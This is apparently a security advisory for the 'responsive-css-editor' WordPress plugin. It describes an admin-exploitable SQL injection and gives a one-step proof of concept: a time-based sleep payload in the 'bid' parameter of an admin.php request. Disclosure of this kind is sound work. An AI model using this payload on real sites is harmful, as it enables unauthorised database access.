The plugin does not properly sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by high-privilege users such as admin.
1. Send a request with the payload: /wp-admin/admin.php?page=responsive_css_editor_setting&updateorder;=false&deletebreakpoints;=true&bid;=(select*from(select(sleep(5)))a) 2. See SQLi
CPE | Name | Operator | Version |
---|---|---|---|
responsive-css-editor | eq | * |